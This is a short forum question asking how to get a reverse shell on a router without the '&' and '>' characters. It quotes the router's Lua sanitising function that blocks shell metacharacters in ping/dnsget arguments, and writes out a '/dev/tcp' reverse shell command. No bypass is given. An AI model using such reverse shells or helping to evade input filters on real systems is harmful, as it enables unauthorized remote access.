[QUESTION] Is way of getting a reverse shell without using & and >

[mbana]

Hi, I would appreciate all the help I can get. Ping @lukechilds and @uzil.

Summary: Is there another way of getting a reverse shell without using redirection etc?

Let's say I have this piece of code in my router hindering me from obtaining a reverse shell:

--- Helper function to check that the arguments that are passed to dnsget / ping do not contain special characters that make
-- the call turn into an exploit
-- @param str The string to check
-- @return true if the string does not contain an apparent exploit, false otherwise
local function check_for_exploit(str)
    if str then
        -- try to make sure the string is not an exploit in disguise
        -- it is about to be concatenated to a command so ...
        return match(str,"^[^<>%s%*%(%)%|&;~!?\\$]+$") and not (match(str,"^-") or match(str,"-$"))
    else
        return false
    end
end

This means I cannot use something like:

sh -i >& /dev/tcp/10.1.1.6/4444 0>&1

as the & and the > characters will cause check_for_exploit to return true.

Thanks,